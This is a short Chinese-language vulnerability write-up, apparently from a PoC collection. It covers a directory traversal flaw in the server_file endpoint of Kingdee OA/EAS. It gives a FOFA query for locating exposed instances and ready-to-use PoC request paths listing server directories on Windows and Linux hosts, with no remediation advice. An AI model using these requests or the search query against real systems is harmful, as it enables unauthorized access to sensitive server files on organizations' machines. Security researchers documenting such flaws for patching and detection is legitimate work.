# 金蝶OA server_file 目录遍历漏洞
## 漏洞描述
金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息
## 漏洞影响
> [!NOTE]
>
> 金蝶OA
## FOFA
> [!NOTE]
>
> app=”Kingdee-EAS”
## 漏洞复现
登录界面为
漏洞POC
“`
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
“`
![image-20210603133022065](C:/Users/peiqi/AppData/Roaming/Typora/typora-user-images/image-20210603133022065.png)
“`
Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=
Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容